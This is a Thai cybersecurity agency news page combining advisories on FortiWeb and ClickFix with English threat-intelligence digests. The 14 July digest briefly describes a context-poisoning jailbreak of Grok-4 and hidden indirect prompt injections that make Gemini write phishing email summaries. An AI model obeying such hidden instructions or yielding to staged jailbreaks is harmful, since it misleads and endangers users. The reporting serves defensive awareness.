สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
administrators
-
Fortinet แพตช์ช่องโหว่ CVE-2025-25257 บน FortiWeb เสี่ยงถูกโจมตีแบบ SQL Injection
-
ข้อมูลการรับสมัครงานของแมคโดนัลด์ กว่า 64 ล้านรายการ เสี่ยงรั่วไหลจากการตั้งรหัสผ่าน 123456
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
ช่องโหว่ร้ายแรงใน FortiWeb
เมื่อวันที่ 10 กรกฎาคม 2568 Cyber Security Agency of Singapore (CSA) รายงานเกี่ยวกับบริษัท Fortinet ได้เผยแพร่การอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรงที่ส่งผลกระทบต่อผลิตภัณฑ์ FortiWeb บริษัท Fortinet ได้เผยแพร่การอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรง หมายเลข CVE-2025-25257 ที่ส่งผลกระทบต่อผลิตภัณฑ์ FortiWeb
ผลกระทบ
การใช้ประโยชน์จากช่องโหว่ในคำสั่ง Structured Query Language (SQL) สำเร็จอาจทำให้ผู้โจมตีที่ไม่ได้รับการยืนยันตัวตนสามารถรันโค้ดหรือคำสั่ง SQL ที่ไม่ได้รับอนุญาตผ่านการร้องขอ HTTP หรือ HTTPS ที่ถูกออกแบบมาโดยเฉพาะ
ผลิตภัณฑ์ที่ได้รับผลกระทบ
ช่องโหว่นี้ส่งผลกระทบต่อผลิตภัณฑ์ดังต่อไปนี้- FortiWeb รุ่น 7.6.0 ถึง 7.6.3
- FortiWeb รุ่น 7.4.0 ถึง 7.4.7
- FortiWeb รุ่น 7.2.0 ถึง 7.2.10
- FortiWeb รุ่น 7.0.0 ถึง 7.0.10
แนวทางการแก้ไข
ผู้ใช้และผู้ดูแลระบบของผลิตภัณฑ์รุ่นที่ได้รับผลกระทบควรดำเนินการอัปเกรดเป็นรุ่นล่าสุดโดยทันที ในกรณีที่ไม่สามารถดำเนินการแพตช์ได้ทันทีหรือไม่เป็นไปได้ ผู้ดูแลระบบควรปิดใช้งานอินเทอร์เฟซการจัดการ HTTP/HTTPS เป็นการแก้ไขชั่วคราวอ้างอิง
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-069สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
แคมเปญ ClickFix ถูกใช้โจมตี แบบ Social Engineerin
เมื่อวันที่ 10 กรกฎาคม 2568 Cyber Security Agency of Singapore (CSA) รายงานว่ามีผู้ไม่ประสงค์ดีใช้เทคนิคการหลอกลวงทางสังคม (Social Engineering) ที่เรียกว่า ClickFix เพื่อหลอกลวงให้ผู้ที่อาจตกเป็นเหยื่อรันคำสั่งที่เป็นอันตราย
ตามรายงาน ผู้ไม่ประสงค์ดีใช้เทคนิค ClickFix เพื่อหลอกลวงให้ผู้ที่อาจตกเป็นเหยื่อรันคำสั่งที่เป็นอันตราย โดยอ้างว่าเป็นการ “แก้ไขด่วน” สำหรับปัญหาคอมพิวเตอร์ทั่วไป เทคนิคนี้มุ่งเป้าไปที่องค์กรในหลากหลายภาคส่วน รวมถึง อุตสาหกรรมเทคโนโลยี, การเงิน, การผลิต, การค้าส่งและค้าปลีก, หน่วยงานภาครัฐ, บริการวิชาชีพและกฎหมาย, สาธารณูปโภค และพลังงาน
ClickFix คืออะไร
ClickFix เป็นเทคนิคการหลอกลวงทางสังคมรูปแบบใหม่ที่ผู้ไม่ประสงค์ดีใช้มากขึ้น โดยหลอกให้ผู้ใช้ที่ถูกกำหนดเป้าหมายดำเนินการ “แก้ไขด่วน” สำหรับปัญหาคอมพิวเตอร์ เช่น ปัญหาด้านประสิทธิภาพ, ไดรเวอร์ขาดหาย หรือข้อผิดพลาดแบบป๊อปอัพ ตั้งแต่มีรายงานครั้งแรกในปี พ.ศ. 2567 เทคนิค ClickFix ได้นำไปสู่การแพร่กระจายมัลแวร์ผ่านเว็บไซต์ที่ถูกบุกรุก, โครงสร้างพื้นฐานการแจกจ่ายที่เป็นอันตราย และอีเมลฟิชชิ่ง
กลยุทธ์ เทคนิค และขั้นตอน (TTPs)
เทคนิค ClickFix อาศัยการ จี้คลิปบอร์ด (Clipboard Hijacking) โดยซอฟต์แวร์ที่เป็นอันตรายจะดักจับและแก้ไขข้อมูลที่ผู้ใช้คัดลอกและวางบนอุปกรณ์อย่างลับๆ โดยมักใช้กล่องโต้ตอบที่มีข้อความแสดงข้อผิดพลาดปลอมเพื่อหลอกให้ผู้ใช้คัดลอกสคริปต์หรือคำสั่งที่เป็นอันตรายลงในคลิปบอร์ดโดยใช้ ClickFix inject ก่อนให้คำแนะนำให้วางและรันเนื้อหาที่เป็นอันตราย ในช่วงไม่กี่เดือนที่ผ่านมา ผู้ไม่ประสงค์ดีได้ใช้หน้าเว็บยืนยันตัวตนปลอมที่ขอให้ผู้ใช้ดำเนินการบางอย่างก่อนเปลี่ยนเส้นทางไปยังหน้าเว็บที่ต้องการ ตัวอย่างข้อความป๊อปอัพของแคมเปญ ClickFix ปรากฏใน ภาคผนวก A ผู้ที่ตกเป็นเหยื่อมักดำเนินการตามขั้นตอนสามขั้นตอนที่ทำให้คำสั่ง PowerShell ที่เป็นอันตรายทำงานได้ ดังนี้:- เปิดกล่องโต้ตอบ Windows Run
- คัดลอกและวางคำสั่ง PowerShell ที่เป็นอันตรายลงในเทอร์มินัลโดยอัตโนมัติหรือด้วยตนเอง [กด 'CTRL+V']
- รันคำสั่ง [กด ‘Enter’]
ผลกระทบ
การดำเนินการเทคนิค ClickFix สำเร็จสามารถนำไปสู่การติดตั้งมัลแวร์หลากหลายประเภท เช่น NetSupport RAT, Latrodectus และ Lumma Stealer ซึ่งอาจส่งผลให้เกิดการขโมยข้อมูลประจำตัว, การรั่วไหลของข้อมูล, การบุกรุกบัญชีอีเมล และเหตุการณ์แรนซัมแวร์ ผู้ไม่ประสงค์ดีสามารถใช้การเข้าถึงระบบที่ถูกบุกรุกเพื่อยกระดับสิทธิ์และเคลี่อนย้ายไปยังระบบอื่นภายในเครือข่ายแนวทางการป้องกัน
องค์กรควรดำเนินมาตรการป้องกันดังต่อไปนี้เพื่อป้องกันแคมเปญ ClickFix- เพิ่มความระมัดระวัง ต่อป๊อปอัพ “CAPTCHA” หรือ “Fix It” ปลอม และจดจำสัญญาณเตือน เช่น คำแนะนำให้ใช้กล่องโต้ตอบ Run โดยไม่คาดคิด
- ปรับปรุงระบบ แอปพลิเคชัน และซอฟต์แวร์ให้เป็นเวอร์ชันล่าสุด และใช้ซอฟต์แวร์ป้องกันไวรัสที่ทันสมัยเพื่อตรวจจับมัลแวร์และลิงก์ฟิชชิ่งที่เป็นอันตราย
- ใช้โซลูชัน SIEM เพื่อบันทึกข้อมูล, มองเห็นสินทรัพย์ และตรวจสอบระบบอย่างต่อเนื่องเพื่อตรวจจับการเชื่อมต่อเครือข่ายที่ผิดปกติและคำสั่ง PowerShell ที่เป็นอันตราย
- บังคับใช้นโยบายควบคุมการเข้าถึงที่เข้มงวด เพื่อให้ผู้ใช้และระบบมีสิทธิ์ขั้นต่ำที่จำเป็น เพื่อจำกัดผลกระทบจากการถูกบุกรุกและป้องกันการยกระดับสิทธิ์และการเคลื่อนย้ายด้านข้าง
- ใช้การควบคุมแอปพลิเคชัน (Application Whitelisting) เพื่ออนุญาตให้เฉพาะซอฟต์แวร์และสคริปต์ที่ได้รับอนุญาตทำงาน เพื่อป้องกันการรันไฟล์ปฏิบัติการที่ไม่รู้จักและสคริปต์ PowerShell ที่เป็นอันตราย
- ผู้ดูแลระบบควรพิจารณาติดตามและบล็อก ตัวบ่งชี้การถูกโจมตี (IOCs) ที่เกี่ยวข้องกับแคมเปญ ClickFix ดังแสดงในตารางด้านล่าง
อ้างอิง
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-068สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
CISA ออกคำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม 13 รายการ
Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) 13 รายการ เมื่อวันที่ 10 กรกฎาคม 2568 ซึ่งคำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน มีดังต่อไปนี้
- ICSA-25-191-01 Siemens SINEC NMS
- ICSA-25-191-02 Siemens Solid Edge
- ICSA-25-191-03 Siemens TIA Administrator
- ICSA-25-191-04 Siemens SIMATIC CN 4100
- ICSA-25-191-05 Siemens TIA Project-Server and TIA Portal
- ICSA-25-191-06 Siemens SIPROTEC 5
- ICSA-25-191-07 Delta Electronics DTM Soft
- ICSA-25-191-08 Advantech iView
- ICSA-25-191-09 KUNBUS RevPi Webstatus
- ICSA-25-191-10 End-of-Train and Head-of-Train Remote Linking Protocol
- ICSA-25-121-01 KUNBUS GmbH Revolution Pi (Update A)
- ICSA-25-135-19 ECOVACS DEEBOT Vacuum and Base Station (Update A)
- ICSA-24-263-02 IDEC Products (Update A)
ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ รายละเอียดเพิ่มเติมที่ https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-releases-thirteen-industrial-control-systems-advisories
อ้างอิง
https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-releases-thirteen-industrial-control-systems-advisories
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand -
CISA ออกคำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม 1 รายการ
Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม (ICS) 1 รายการ เมื่อวันที่ 8 กรกฎาคม 2568 ซึ่งคำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน มีดังต่อไปนี้
- ICSA-25-189-01 Emerson ValveLink Products
ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ รายละเอียดเพิ่มเติมที่ https://www.cisa.gov/news-events/alerts/2025/07/08/cisa-releases-one-industrial-control-systems-advisory
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Cyber Threat Intelligence 14 July 2025
Financial Sector
- Financial Firms Are Locking The Front Door But Leaving The Back Open
"Financial institutions are building stronger defenses against direct cyberattacks, but they may be overlooking a growing problem: their vendors. According to Black Kite’s new report, third-party risk has become one of the biggest cybersecurity threats facing the financial sector."
https://www.helpnetsecurity.com/2025/07/11/financial-firms-third-party-cyber-risk/ - Factoring Cybersecurity Into Finance's Digital Strategy
"The financial industry is witnessing a significant shift, fueled by artificial intelligence (AI) advancements to meet consumer demand for digital and personalized services. A recent Gartner report highlighted that the adoption of AI in financial functions surged by 21% in 2024 alone. With technological leaps transforming operations comes equal technological advancement for bad actors to breach financial institution infrastructures. As a result, financial institutions must undertake a critical responsibility to stay ahead of threats to safeguard their assets as well as customers' data and privacy. This requires implementing a combination of reactive defense mechanisms and designing proactive systems capable of anticipating and preventing emerging threats."
https://www.darkreading.com/cyberattacks-data-breaches/factoring-cybersecurity-finances-digital-strategy
Vulnerabilities
- Pre-Auth SQL Injection To RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257)
"Welcome back to yet another day in this parallel universe of security. This time, we’re looking at Fortinet’s FortiWeb Fabric Connector. “What is that?” we hear you say. That's a great question; no one knows. For the uninitiated, or unjaded; Fortinet’s FortiWeb Fabric Connector is meant to be the glue between FortiWeb (their web application firewall) and other Fortinet ecosystem products, allowing for dynamic, policy-based security updates based on real-time changes in infrastructure or threat posture. Think of it as a fancy middleman - pulling metadata from sources like FortiGate firewalls, FortiManager, or even external services like AWS, and feeding that into FortiWeb so it can automatically adjust its protections. In theory, it should make things smarter and more responsive."
https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/
https://fortiguard.fortinet.com/psirt/FG-IR-25-151
https://www.bleepingcomputer.com/news/security/exploits-for-pre-auth-fortinet-fortiweb-rce-flaw-released-patch-now/
https://thehackernews.com/2025/07/fortinet-releases-patch-for-critical.html
https://hackread.com/critical-vulnerability-fortinet-fortiweb-cve-2025-25257/
https://securityaffairs.com/179874/security/patch-immediately-cve-2025-25257-poc-enables-remote-code-execution-on-fortinet-fortiweb.html - Wing FTP Server Remote Code Execution (CVE-2025-47812) Exploited In The Wild
"Huntress saw active exploitation of Wing FTP Server remote code execution (CVE-2025-47812) on a customer on July 1, 2025. Organizations running Wing FTP Server should update to the fixed version, version 7.4.4, as soon as possible. CVE-2025-47812 is a null byte and Lua injection flaw that can lead to root/SYSTEM-level remote code execution if exploited. The vulnerability was first publicly disclosed on June 30 by Julien Ahrens in versions prior to 7.4.4 of the Wing FTP Server, its file transfer protocol software for Windows, Linux, and macOS. At a high level, CVE-2025-47812 stems from how null bytes are handled in the username parameter (specifically related to the loginok.html file, which handles the authentication process). This can allow remote attackers to perform Lua injection after using the null byte in the username parameter."
https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild
https://thehackernews.com/2025/07/critical-wing-ftp-server-vulnerability.html
https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-rce-flaw-in-wing-ftp-server/
https://www.securityweek.com/critical-wing-ftp-server-vulnerability-exploited/
https://www.theregister.com/2025/07/11/1010_wing_ftp_bug_exploited/
https://www.helpnetsecurity.com/2025/07/11/critical-wing-ftp-server-vulnerability-exploited-in-the-wild-cve-2025-47812/
https://securityaffairs.com/179861/hacking/wing-ftp-server-flaw-actively-exploited-shortly-after-technical-details-were-made-public.html - NVIDIA Shares Guidance To Defend GDDR6 GPUs Against Rowhammer Attacks
"NVIDIA is warning users to activate System Level Error-Correcting Code mitigation to protect against Rowhammer attacks on graphical processors with GDDR6 memory. The company is reinforcing the recommendation as new research demonstrates a Rowhammer attack against an NVIDIA A6000 GPU (graphical processing unit). Rowhammer is a hardware fault that can be triggered through software processes and stems from memory cells being too close to each other. The attack was demonstrated on DRAM cells but it can affect GPU memory, too."
https://www.bleepingcomputer.com/news/security/nvidia-shares-guidance-to-defend-gddr6-gpus-against-rowhammer-attacks/
https://nvidia.custhelp.com/app/answers/detail/a_id/5671
https://thehackernews.com/2025/07/gpuhammer-new-rowhammer-attack-variant.html
https://www.securityweek.com/rowhammer-attack-demonstrated-against-nvidia-gpu/ - Grok-4 Falls To a Jailbreak Two Days After Its Release
"The latest release of the xAI LLM, Grok-4, has already fallen to a sophisticated jailbreak. The Echo Chamber jailbreak attack was described on June 23, 2025. xAI’a latest Grok-4 was released on July 9, 2025. Two days later it fell to a combined Echo Chamber and Crescendo jailbreak attack. Echo Chamber was developed by NeuralTrust. We describe it in New AI Jailbreak Bypasses Guardrails With Ease. It uses subtle context poisoning to nudge an LLM into providing dangerous output. The methodology is shown below."
https://www.securityweek.com/grok-4-falls-to-a-jailbreak-two-days-after-its-release/ - Google Gemini Flaw Hijacks Email Summaries For Phishing
"Google Gemini for Workspace can be exploited to generate email summaries that appear legitimate but include malicious instructions or warnings that direct users to phishing sites without using attachments or direct links. Such an attack leverages indirect prompt injections that are hidden inside an email and obeyed by Gemini when generating the message summary. Despite similar prompt attacks being reported since 2024 and safeguards being implemented to block misleading responses, the technique remains successful."
https://www.bleepingcomputer.com/news/security/google-gemini-flaw-hijacks-email-summaries-for-phishing/
Malware
- Malware Found In Official GravityForms Plugin Indicating Supply Chain Breach
"The Patchstack team has been monitoring targeted supply chain attacks involving a vendor of a plugin or theme. At first, we noticed that Groundhogg was affected by this supply chain attack, and its plugins were compromised by malware that was injected. The full details can be viewed here. Today, we received information about a possible targeted supply chain attack against Gravity Forms. We are still actively investigating to better understand the scale and impact, but as we have proof of infected websites and IOCs to keep an eye on, we're sharing this information in this post so people could check if they have been affected."
https://patchstack.com/articles/critical-malware-found-in-gravityforms-official-plugin-site/
https://www.bleepingcomputer.com/news/security/wordpress-gravity-forms-developer-hacked-to-push-backdoored-plugins/ - BlackSuit: A Hybrid Approach With Data Exfiltration And Encryption
"Cybereason Security Services issue Threat Analysis reports to inform on impacting threats. The Threat Analysis reports investigate these threats and provide practical recommendations for protecting against them. In this Threat Analysis report, Cybereason Security Services investigates a BlackSuit ransomware attack we recently observed that represents a significant threat to organizations, leveraging tools like Cobalt Strike for command and control (C2), rclone for data exfiltration, and BlackSuit ransomware for file encryption."
https://www.cybereason.com/blog/blacksuit-data-exfil - Evolving Tactics Of SLOW#TEMPEST: A Deep Dive Into Advanced Malware Techniques
"In late 2024, we discovered a malware variant related to the SLOW#TEMPEST campaign. In this research article, we explore the obfuscation techniques employed by the malware authors. We deep dive into these malware samples and highlight methods and code that can be used to detect and defeat the obfuscation techniques. Understanding these evolving tactics is essential for security practitioners to develop robust detection rules and strengthen defenses against increasingly sophisticated threats."
https://unit42.paloaltonetworks.com/slow-tempest-malware-obfuscation/ - SafePay Ransomware: The Fast-Rising Threat Targeting MSPs
"In Q1 2025, one ransomware group surged rapidly from obscurity to become one of the most active and dangerous actors on the global threat landscape: SafePay. It has quietly and aggressively built momentum, striking over 200 victims worldwide, including managed service providers (MSPs) and small-to-midsize businesses (SMBs) across industries. Acronis Threat Research Unit (TRU) analyzed several SafePay samples and confirmed the group’s use of recycled — but highly efficient — tactics, including disabling endpoint protection, deleting shadow copies and clearing logs to suppress detection and response. Unlike many ransomware groups that rely on affiliates in a ransomware-as-a-service (RaaS) model, SafePay appears to operate with centralized control, managing its own operations, infrastructure and negotiations."
https://www.acronis.com/en-us/tru/posts/safepay-ransomware-the-fast-rising-threat-targeting-msps/ - Wipe, Leak, Extort: The Crazy Hybrid Playbook Of Anubis Ransomware
"Anubis is a ransomware-as-a-service (RaaS) operation that emerged in December 2024, and quickly distinguished itself by integrating file-wiping capabilities alongside the traditional encryption and data exfiltration. The group operates multiple affiliate programs with revenue splits ranging from 50% to 80%, and targets multiple sectors in several countries, including Australia, Canada, Peru and the United States."
https://blog.barracuda.com/2025/07/11/wipe--leak--extort--the-crazy-hybrid-playbook-of-anubis-ransomwa
Breaches/Hacks/Leaks
- Albemarle Latest Virginia County Hit With Ransomware
"Phone and technology outages that plagued Albemarle County last month were caused by a ransomware attack, officials said in a statement on Friday. The county warned residents that it “appears likely” the hackers accessed the data of local government and public school employees — including their driver’s license numbers, Social Security numbers, passport numbers, military IDs and more. Some of the 112,000 residents of the county, home to the city of Charlottesville, also may have had their names, addresses and Social Security numbers exposed. The county said it is still conducting its investigation into the ransomware attack, which was initially discovered on the morning of June 11."
https://therecord.media/albemarle-virginia-ransomware-attack - Hacker Returns Cryptocurrency Stolen From GMX Exchange After $5 Million Bounty Payment
"The person behind a $42 million theft from decentralized exchange GMX has returned the stolen cryptocurrency in exchange for a $5 million bounty. After the theft came to light on Wednesday, GMX promised the hacker not to pursue litigation if the funds were returned. “You've successfully executed the exploit; your abilities in doing so are evident to anyone looking into the exploit transactions,” the company said in a subsequent note on Thursday."
https://therecord.media/hacker-returns-stolen-gmx-bounty - Exploiting Public APP_KEY Leaks To Achieve RCE In Hundreds Of Laravel Applications
"Laravel APP_KEY leaks enable RCE via deserialization attacks. Collaboration with Synacktiv scaled findings to 600 vulnerable applications using 260K exposed keys from GitHub. Analysis reveals 35% of exposures coincide with other critical secrets including database, cloud tokens, and API credentials."
https://blog.gitguardian.com/exploiting-public-app_key-leaks/
https://thehackernews.com/2025/07/over-600-laravel-apps-exposed-to-remote.html
General News
- Hacktivist Attacks On Critical Infrastructure Grow As New Groups Emerge
"Hacktivists are increasingly targeting critical infrastructure as they expand beyond the DDoS attacks and website defacements typically associated with ideologically motivated cyberattacks. Cyble’s assessment of the hacktivism threat landscape in the second quarter of 2025 found that industrial control system (ICS) attacks, data breaches, and access-based attacks now comprise 31% of hacktivist attacks, up from 29% in the first quarter (chart below)."
https://cyble.com/blog/hacktivists-attacks-on-critical-infrastructure/ - Where Policy Meets Profit: Navigating The New Frontier Of Defense Tech Startups
"In this Help Net Security interview, Thijs Povel, Managing Partner at Ventures.eu, discusses how the firm evaluates emerging technologies through the lens of defense and resilience. He explains how founders from both defense and adjacent sectors are addressing policy shifts, procurement cycles, and dual-use innovation. Povel also offers guidance for founders on handling slow-moving procurement cycles and proving the business case for resilience solutions."
https://www.helpnetsecurity.com/2025/07/11/thijs-povel-ventures-eu-dual-use-tech/ - Employees Are Quietly Bringing AI To Work And Leaving Security Behind
"While IT departments race to implement AI governance frameworks, many employees have already opened a backdoor for AI, according to ManageEngine. Shadow AI has quietly infiltrated organizations across North America, creating blind spots that even the most careful IT leaders struggle to detect. Despite formal guidelines and sanctioned tools, shadow Al has become the norm rather than the exception. 70% of IT decision makers (ITDMs) have identified unauthorized AI use within their organizations."
https://www.helpnetsecurity.com/2025/07/11/organizations-shadow-ai-risk/ - Romania And UK Arrest 14 In British Tax Repayment Scam Probe
"Police on Thursday arrested 13 individuals in Romania and one in England on suspicion of engaging in a massive tax fraud scheme against Great Britain. The arrests appear to be tied to an operation probing a gang that used phishing attacks against British taxpayers to steal 47 million pounds - $63 million - from His Majesty's Revenue and Customs, the U.K. government agency responsible for collecting taxes. Parliament's Treasury Committee, which oversees the tax collector, slammed HMRC top brass for failing to notify lawmakers about the 2024 losses, which only came to light in June when 100,000 taxpayers received notification that their online accounts had been breached."
https://www.bankinfosecurity.com/romania-uk-arrest-14-in-british-tax-repayment-scam-probe-a-28943
https://hackread.com/14-arrested-romania-47-million-uk-tax-phishing-scam/ - As Cyber-Insurance Premiums Drop, Coverage Is Key To Resilience
"The cyber-insurance market continues to generate profits for underwriters, but competition in the market and softening demand has led to a decline in the total revenue from premiums for the third straight year in a row — a situation that could work in businesses' favor. Overall, cyber-insurance experts expect premiums to continue to decline in 2025 and likely level off next year, as market economics balance supply and demand. Renewal rates for cyber-insurance policies have declined each quarter for the last three quarters, which is expected to continue, according to credit and economic firm Fitch Ratings."
https://www.darkreading.com/vulnerabilities-threats/cyber-insurance-premiums-drop-coverage-key-resilience - Google Trackers: What You Can Actually Escape And What You Can’t
"Google is everywhere — in your emails, documents, maps, phone, in your working hours, and even in your leisure time. It’s become a part of our daily lives, and getting out of its ecosystem can feel impossible. But can switching to more privacy-focused options really help an ordinary user break free? Even if you stop using Google products directly, your data might still pass through its servers without your knowledge. Many websites use tools like Google Analytics, embed YouTube videos, run Google ads, or rely on Google Cloud. One common example is reCAPTCHA — countless websites use this tool to verify you’re a human user, and (you guessed it) it belongs to Google, too."
https://www.safetydetectives.com/blog/google-dependency-and-user-data-tracking/
https://hackread.com/new-study-google-tracking-persists-privacy-tools/ - Behind The Code: How Developers Work In 2025
"How are developers working in 2025? Docker surveyed over 4,500 people to find out, and the answers are a mix of progress and ongoing pain points. AI is gaining ground but still unevenly used. Security is now baked into everyday workflows. Most devs have left local setups behind in favor of cloud environments. And while tools are improving, coordination, planning, and time estimation still slow teams down."
https://www.helpnetsecurity.com/2025/07/11/docker-2025-developer-trends/ - July 2025 Breaks a Decade Of Monthly Android Patches
"Google this week announced that no security patches have been released for Android, Pixel devices, and other Android-based platforms this month, ending a decade-long streak of security updates. As customary in the first week of each month, security bulletins were published for the core Android operating system, as well as for Pixel devices, Android Automotive OS (AAOS), Wear OS, and Pixel Watch, but they all contain the same message: there are no security patches in the July 2025 bulletin. This is the first month without security updates since Google started rolling out monthly Android fixes in August 2015, looking to make the mobile operating system safer for both users and vendors."
https://www.securityweek.com/july-2025-breaks-a-decade-of-monthly-android-patches/ - You Have a Fake North Korean IT Worker Problem - Here's How To Stop It
"By now, the North Korean fake IT worker problem is so ubiquitous that if you think you don't have any phony resumes or imposters in your interview queue, you're asleep at the wheel. "Almost every CISO of a Fortune 500 company that I've spoken to — I'll just characterize as dozens that I've spoken to — have admitted that they had a North Korean IT worker problem," said Mandiant Consulting CTO Charles Carmakal during a threat-intel roundtable, admitting that even Mandiant's parent company Google is not immune. "We have seen this in our own pipelines," added Iain Mulholland, Google Cloud's senior director of security engineering."
https://www.theregister.com/2025/07/13/fake_it_worker_problem/
อ้างอิง
Electronic Transactions Development Agency(ETDA) - Financial Firms Are Locking The Front Door But Leaving The Back Open
-
Cyber Threat Intelligence 11 July 2025
Industrial Sector
- CISA Releases Thirteen Industrial Control Systems Advisories
"CISA released thirteen Industrial Control Systems (ICS) advisories on July 10, 2025. These advisories provide timely information about current security issues, vulnerabilities, and exploits surrounding ICS.
ICSA-25-191-01 Siemens SINEC NMS
ICSA-25-191-02 Siemens Solid Edge
ICSA-25-191-03 Siemens TIA Administrator
ICSA-25-191-04 Siemens SIMATIC CN 4100
ICSA-25-191-05 Siemens TIA Project-Server and TIA Portal
ICSA-25-191-06 Siemens SIPROTEC 5
ICSA-25-191-07 Delta Electronics DTM Soft
ICSA-25-191-08 Advantech iView
ICSA-25-191-09 KUNBUS RevPi Webstatus
ICSA-25-191-10 End-of-Train and Head-of-Train Remote Linking Protocol"
https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-releases-thirteen-industrial-control-systems-advisories
Vulnerabilities
- How Tenable Research Discovered a Critical Remote Code Execution Vulnerability On Anthropic MCP Inspector
"Tenable Research recently discovered a critical vulnerability impacting Anthropic's MCP Inspector tool, a core element of the MCP ecosystem. In this blog, we provide details on how we discovered the vulnerability in this widely used open-source tool — and what users can do about it. Tenable Research discovered a critical vulnerability (CVE-2025-49596) in Anthropic's MCP Inspector. This open-source tool, widely used for testing and troubleshooting Model Context Protocol (MCP) servers, is highly popular with over 38,000 weekly downloads on npmjs and more than 4,000 stars on GitHub. Further details are available in the advisory."
https://www.tenable.com/blog/how-tenable-research-discovered-a-critical-remote-code-execution-vulnerability-on-anthropic
https://www.darkreading.com/application-security/agentic-ai-risky-mcp-backbone-attack-vectors - CISA Adds One Known Exploited Vulnerability To Catalog
"CISA has added one new vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-5777 Citrix NetScaler ADC and Gateway Out-of-Bounds Read Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/07/10/cisa-adds-one-known-exploited-vulnerability-catalog
https://www.theregister.com/2025/07/10/cisa_citrixbleed_kev/ - PerfektBlue Bluetooth Flaws Impact Mercedes, Volkswagen, Skoda Cars
"Four vulnerabilities dubbed PerfektBlue and affecting the BlueSDK Bluetooth stack from OpenSynergy can be exploited to achieve remote code execution and potentially allow access to critical elements in vehicles from multiple vendors, including Mercedes-Benz AG, Volkswagen, and Skoda. OpenSynergy confirmed the flaws last year in June and released patches to customers in September 2024 but many automakers have yet to push the corrective firmware updates. At least one major OEM learned only recently about the security risks. The security issues can be chained together into an exploit that researchers call a PerfektBlue attack and can be delivered over-the-air by an attacker, requiring "at most 1-click from a user.""
https://www.bleepingcomputer.com/news/security/perfektblue-bluetooth-flaws-impact-mercedes-volkswagen-skoda-cars/
https://pcacybersecurity.com/resources/advisory/perfekt-blue
https://www.securityweek.com/millions-of-cars-exposed-to-remote-hacking-via-perfektblue-attack/
https://securityaffairs.com/179789/hacking/perfektblue-bluetooth-attack-allows-hacking-infotainment-systems-of-mercedes-volkswagen-and-skoda.html - Asus And Adobe Vulnerabilities
"Cisco Talos’ Vulnerability Discovery & Research team recently disclosed two vulnerabilities each in Asus Armoury Crate and Adobe Acrobat products. The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website."
https://blog.talosintelligence.com/asus-and-adobe-vulnerabilities/ - eSIM Bug In Millions Of Phones Enables Spying, Takeover
"Systemic vulnerabilities in embedded Subscriber Identity Module (eSIM) cards have exposed billions of devices to spying, SIM swaps, and other threats. Billions of phone users around the world have moved on from traditional SIM cards to eSIMs. They allow multiple phone carrier subscriptions to exist on a single device. Unlike traditional SIM cards, you can't physically remove and replace them, and they tout superior security."
https://www.darkreading.com/endpoint-security/esim-bug-millions-phones-spying-takeover
https://www.securityweek.com/esim-hack-allows-for-cloning-spying/ - Fix The Click: Preventing The ClickFix Attack Vector
"In this article, we share hunting tips and mitigation strategies for ClickFix campaigns and provide an inside view of some of the most prominent ClickFix campaigns we have seen so far in 2025: - Attackers distributing NetSupport remote access Trojan (RAT) are ramping up activities with a new loader
- Attackers distributing Latrodectus malware are luring victims with a new ClickFix campaign
- Prolific Lumma Stealer campaign targeting multiple industries with new techniques"
https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/
Malware
- Code Highlighting With Cursor AI For $500,000
"Attacks that leverage malicious open-source packages are becoming a major and growing threat. This type of attacks currently seems commonplace, with reports of infected packages in repositories like PyPI or npm appearing almost daily. It would seem that increased scrutiny from researchers on these repositories should have long ago minimized the profits for cybercriminals trying to make a fortune from malicious packages. However, our investigation into a recent cyberincident once again confirmed that open-source packages remain an attractive way for attackers to make easy money."
https://securelist.com/open-source-package-for-cursor-ai-turned-into-a-crypto-heist/116908/ - Crypto Wallets Continue To Be Drained In Elaborate Social Media Scam
